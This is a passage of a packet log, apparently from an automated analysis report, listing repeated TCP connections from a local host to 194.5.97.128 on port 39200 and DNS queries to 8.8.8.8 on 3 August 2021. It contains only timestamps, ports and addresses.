Aug 3, 2021 19:06:31.735658884 CEST	49885	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:31.781059027 CEST	39200	49885	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:32.832540035 CEST	49886	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:32.877837896 CEST	39200	49886	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:33.392030001 CEST	49886	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:33.438004971 CEST	39200	49886	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:33.939009905 CEST	49886	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:33.985343933 CEST	39200	49886	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:35.027884960 CEST	49887	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:35.073492050 CEST	39200	49887	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:35.579865932 CEST	49887	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:35.625597000 CEST	39200	49887	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:36.126832962 CEST	49887	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:36.173814058 CEST	39200	49887	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:37.233108997 CEST	49888	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:37.278522968 CEST	39200	49888	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:37.783150911 CEST	49888	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:37.828711987 CEST	39200	49888	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:38.329999924 CEST	49888	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:38.375675917 CEST	39200	49888	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:39.423039913 CEST	49889	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:39.468270063 CEST	39200	49889	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:39.986429930 CEST	49889	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:40.033574104 CEST	39200	49889	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:40.576059103 CEST	49889	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:40.622015953 CEST	39200	49889	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:41.666945934 CEST	49890	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:41.712177038 CEST	39200	49890	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:42.221091032 CEST	49890	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:42.266691923 CEST	39200	49890	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:42.771563053 CEST	49890	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:42.817167997 CEST	39200	49890	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:43.875828981 CEST	49891	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:43.921662092 CEST	39200	49891	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:44.425477982 CEST	49891	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:44.474353075 CEST	39200	49891	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:44.986974001 CEST	49891	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:45.032598972 CEST	39200	49891	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:46.093945026 CEST	49892	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:46.140872955 CEST	39200	49892	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:46.643384933 CEST	49892	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:46.690121889 CEST	39200	49892	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:47.205933094 CEST	49892	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:47.251617908 CEST	39200	49892	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:48.303509951 CEST	49893	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:48.349108934 CEST	39200	49893	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:48.862210035 CEST	49893	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:48.907774925 CEST	39200	49893	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:49.409302950 CEST	49893	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:49.455645084 CEST	39200	49893	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:50.515818119 CEST	49894	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:50.561337948 CEST	39200	49894	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:51.066028118 CEST	49894	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:51.111347914 CEST	39200	49894	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:51.612391949 CEST	49894	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:51.657660007 CEST	39200	49894	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:52.696914911 CEST	49895	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:52.742420912 CEST	39200	49895	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:53.254034042 CEST	49895	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:53.299976110 CEST	39200	49895	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:53.800081015 CEST	49895	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:53.849498034 CEST	39200	49895	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:54.907023907 CEST	49897	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:54.953602076 CEST	39200	49897	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:55.456515074 CEST	49897	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:55.501853943 CEST	39200	49897	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:56.003484964 CEST	49897	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:56.049099922 CEST	39200	49897	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:57.098428011 CEST	49898	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:57.144119024 CEST	39200	49898	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:57.659830093 CEST	49898	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:57.705300093 CEST	39200	49898	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:58.206790924 CEST	49898	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:58.254067898 CEST	39200	49898	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:59.309905052 CEST	49899	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:59.355293989 CEST	39200	49899	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:59.863033056 CEST	49899	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:59.909739017 CEST	39200	49899	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:00.425555944 CEST	49899	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:00.474869967 CEST	39200	49899	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:01.572983980 CEST	49900	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:01.618397951 CEST	39200	49900	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:02.132060051 CEST	49900	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:02.183377028 CEST	39200	49900	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:02.691395044 CEST	49900	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:02.737047911 CEST	39200	49900	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:03.780097008 CEST	49901	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:03.825373888 CEST	39200	49901	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:04.332253933 CEST	49901	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:04.377600908 CEST	39200	49901	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:04.879179955 CEST	49901	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:04.924866915 CEST	39200	49901	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:05.976339102 CEST	49902	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:06.021800041 CEST	39200	49902	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:06.535509109 CEST	49902	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:06.581052065 CEST	39200	49902	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:07.082885027 CEST	49902	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:07.129515886 CEST	39200	49902	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:08.179610968 CEST	49903	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:08.226037025 CEST	39200	49903	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:08.738766909 CEST	49903	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:08.787506104 CEST	39200	49903	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:09.301460028 CEST	49903	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:09.347641945 CEST	39200	49903	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:10.414964914 CEST	49904	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:10.460484982 CEST	39200	49904	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:10.973582029 CEST	49904	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:11.018999100 CEST	39200	49904	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:11.523499012 CEST	49904	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:11.569808006 CEST	39200	49904	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:12.617299080 CEST	49905	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:12.662750959 CEST	39200	49905	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:13.176861048 CEST	49905	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:13.227617979 CEST	39200	49905	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:13.739285946 CEST	49905	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:13.784826040 CEST	39200	49905	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:14.824423075 CEST	49906	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:14.869770050 CEST	39200	49906	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:15.379997969 CEST	49906	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:15.425342083 CEST	39200	49906	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:16.006273985 CEST	49906	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:16.063294888 CEST	39200	49906	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:17.269675970 CEST	49907	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:17.315284014 CEST	39200	49907	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:17.823177099 CEST	49907	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:17.899580956 CEST	39200	49907	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:18.427130938 CEST	49907	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:18.473031044 CEST	39200	49907	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:19.535670042 CEST	49908	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:19.581233978 CEST	39200	49908	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:20.083532095 CEST	49908	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:20.132635117 CEST	39200	49908	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:20.646080017 CEST	49908	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:20.691811085 CEST	39200	49908	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:21.737720013 CEST	49909	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:21.783260107 CEST	39200	49909	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:22.287080050 CEST	49909	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:22.333579063 CEST	39200	49909	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:22.833837032 CEST	49909	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:22.879590034 CEST	39200	49909	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:23.916898012 CEST	49910	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:23.972100973 CEST	39200	49910	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:24.474529028 CEST	49910	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:24.520498991 CEST	39200	49910	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:25.021469116 CEST	49910	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:25.067948103 CEST	39200	49910	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:26.128936052 CEST	49911	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:26.174613953 CEST	39200	49911	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:26.693566084 CEST	49911	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:26.739140987 CEST	39200	49911	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:27.240549088 CEST	49911	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:27.287323952 CEST	39200	49911	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:28.348025084 CEST	49912	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:28.396284103 CEST	39200	49912	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:28.896902084 CEST	49912	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:28.942182064 CEST	39200	49912	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:29.459849119 CEST	49912	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:29.509955883 CEST	39200	49912	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:30.568357944 CEST	49914	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:30.615365982 CEST	39200	49914	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:31.116172075 CEST	49914	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:31.162517071 CEST	39200	49914	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:31.662602901 CEST	49914	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:31.709501982 CEST	39200	49914	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:32.804034948 CEST	49915	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:32.852220058 CEST	39200	49915	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:33.365955114 CEST	49915	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:33.413006067 CEST	39200	49915	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:33.932990074 CEST	49915	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:33.981995106 CEST	39200	49915	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:35.041141987 CEST	49916	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:35.086716890 CEST	39200	49916	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:35.600578070 CEST	49916	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:35.646138906 CEST	39200	49916	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:36.147535086 CEST	49916	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:36.192987919 CEST	39200	49916	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:37.240454912 CEST	49917	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:37.285865068 CEST	39200	49917	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:37.788307905 CEST	49917	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:37.833729029 CEST	39200	49917	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:38.335295916 CEST	49917	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:38.380734921 CEST	39200	49917	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:39.417766094 CEST	49918	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:39.462954998 CEST	39200	49918	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:39.976821899 CEST	49918	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:40.024174929 CEST	39200	49918	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:40.538434029 CEST	49918	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:40.583856106 CEST	39200	49918	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:41.627320051 CEST	49919	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:41.673350096 CEST	39200	49919	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:42.179203987 CEST	49919	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:42.224632025 CEST	39200	49919	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:42.726105928 CEST	49919	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:42.771717072 CEST	39200	49919	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:43.825098038 CEST	49920	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:43.872083902 CEST	39200	49920	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:44.382518053 CEST	49920	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:44.428026915 CEST	39200	49920	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:44.929455996 CEST	49920	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:44.974874973 CEST	39200	49920	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:46.010142088 CEST	49921	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:46.055397987 CEST	39200	49921	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:46.570242882 CEST	49921	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:46.615498066 CEST	39200	49921	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:47.117835045 CEST	49921	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:47.162940979 CEST	39200	49921	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:48.246397972 CEST	49922	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:48.291903019 CEST	39200	49922	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:48.804675102 CEST	49922	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:48.850142956 CEST	39200	49922	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:49.351603985 CEST	49922	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:49.397146940 CEST	39200	49922	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:50.442295074 CEST	49923	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:50.495345116 CEST	39200	49923	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:51.010164976 CEST	49923	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:51.055974960 CEST	39200	49923	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:51.570696115 CEST	49923	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:51.616360903 CEST	39200	49923	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:52.737888098 CEST	49924	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:52.791280985 CEST	39200	49924	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:53.305154085 CEST	49924	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:53.350486994 CEST	39200	49924	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:53.852113962 CEST	49924	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:53.897510052 CEST	39200	49924	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:54.936202049 CEST	49925	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:54.981467962 CEST	39200	49925	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:55.492820024 CEST	49925	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:55.540071964 CEST	39200	49925	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:56.055327892 CEST	49925	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:56.100765944 CEST	39200	49925	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:57.142620087 CEST	49926	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:57.188092947 CEST	39200	49926	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:57.696283102 CEST	49926	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:57.741827965 CEST	39200	49926	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:58.243031979 CEST	49926	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:58.288892031 CEST	39200	49926	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:59.325272083 CEST	49927	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:59.370809078 CEST	39200	49927	194.5.97.128	192.168.2.3
Aug 3, 2021 19:07:59.883811951 CEST	49927	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:07:59.929371119 CEST	39200	49927	194.5.97.128	192.168.2.3
Aug 3, 2021 19:08:00.430704117 CEST	49927	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:08:00.478880882 CEST	39200	49927	194.5.97.128	192.168.2.3
Aug 3, 2021 19:08:01.530103922 CEST	49928	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:08:01.575453043 CEST	39200	49928	194.5.97.128	192.168.2.3
Aug 3, 2021 19:08:02.087053061 CEST	49928	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:08:02.132355928 CEST	39200	49928	194.5.97.128	192.168.2.3
Aug 3, 2021 19:08:02.633970022 CEST	49928	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:08:02.690817118 CEST	39200	49928	194.5.97.128	192.168.2.3
Aug 3, 2021 19:08:03.731992006 CEST	49929	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:08:03.778356075 CEST	39200	49929	194.5.97.128	192.168.2.3
Aug 3, 2021 19:08:04.290879965 CEST	49929	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:08:04.339576960 CEST	39200	49929	194.5.97.128	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 3, 2021 18:59:23.658386946 CEST	49199	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:23.685910940 CEST	53	49199	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:24.659580946 CEST	50620	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:24.685204029 CEST	53	50620	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:25.792309046 CEST	64938	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:25.817255974 CEST	53	64938	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:26.176440954 CEST	60152	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:26.210597992 CEST	53	60152	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:26.804635048 CEST	57544	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:26.833452940 CEST	53	57544	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:27.911753893 CEST	55984	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:27.936414957 CEST	53	55984	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:29.323223114 CEST	64185	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:29.349575043 CEST	53	64185	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:30.824228048 CEST	65110	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:30.856558084 CEST	53	65110	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:32.922413111 CEST	58361	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:32.947650909 CEST	53	58361	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:33.951771021 CEST	63492	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:33.979088068 CEST	53	63492	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:35.024971962 CEST	60831	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:35.049942017 CEST	53	60831	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:36.335195065 CEST	60100	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:36.361124039 CEST	53	60100	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:38.185023069 CEST	53195	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:38.232830048 CEST	53	53195	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:39.062377930 CEST	50141	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:39.089895010 CEST	53	50141	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:40.103996038 CEST	53023	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:40.143980026 CEST	53	53023	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:41.545511007 CEST	49563	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:41.572935104 CEST	53	49563	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:42.735898018 CEST	51352	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:42.763403893 CEST	53	51352	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:43.575406075 CEST	59349	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:43.609272957 CEST	53	59349	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:44.570820093 CEST	57084	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:44.659749985 CEST	53	57084	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:45.928265095 CEST	58823	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:45.956907034 CEST	53	58823	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:53.437380075 CEST	57568	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:53.474836111 CEST	53	57568	8.8.8.8	192.168.2.3
Aug 3, 2021 18:59:58.858021975 CEST	50540	53	192.168.2.3	8.8.8.8
Aug 3, 2021 18:59:58.901704073 CEST	53	50540	8.8.8.8	192.168.2.3
Aug 3, 2021 19:00:23.803713083 CEST	54366	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:00:23.845678091 CEST	53	54366	8.8.8.8	192.168.2.3
Aug 3, 2021 19:00:40.334332943 CEST	53034	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:00:40.378686905 CEST	53	53034	8.8.8.8	192.168.2.3
Aug 3, 2021 19:00:51.846848965 CEST	57762	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:00:51.885240078 CEST	53	57762	8.8.8.8	192.168.2.3
Aug 3, 2021 19:01:20.989435911 CEST	55435	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:01:21.041529894 CEST	53	55435	8.8.8.8	192.168.2.3
Aug 3, 2021 19:01:22.833671093 CEST	50713	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:01:22.883351088 CEST	53	50713	8.8.8.8	192.168.2.3
Aug 3, 2021 19:01:32.114979982 CEST	56132	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:01:32.150788069 CEST	53	56132	8.8.8.8	192.168.2.3
Aug 3, 2021 19:01:34.315417051 CEST	58987	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:01:34.349643946 CEST	53	58987	8.8.8.8	192.168.2.3
Aug 3, 2021 19:01:36.516494036 CEST	56579	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:01:36.548902035 CEST	53	56579	8.8.8.8	192.168.2.3
Aug 3, 2021 19:01:38.721241951 CEST	60633	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:01:38.753732920 CEST	53	60633	8.8.8.8	192.168.2.3
Aug 3, 2021 19:01:40.908818960 CEST	61292	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:01:40.941567898 CEST	53	61292	8.8.8.8	192.168.2.3
Aug 3, 2021 19:01:43.099242926 CEST	63619	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:01:43.134553909 CEST	53	63619	8.8.8.8	192.168.2.3
Aug 3, 2021 19:01:45.284416914 CEST	64938	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:01:45.317775965 CEST	53	64938	8.8.8.8	192.168.2.3
Aug 3, 2021 19:01:47.753312111 CEST	61946	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:01:47.786495924 CEST	53	61946	8.8.8.8	192.168.2.3
Aug 3, 2021 19:01:50.319245100 CEST	64910	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:01:50.345753908 CEST	53	64910	8.8.8.8	192.168.2.3
Aug 3, 2021 19:01:52.518642902 CEST	52123	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:01:52.544380903 CEST	53	52123	8.8.8.8	192.168.2.3
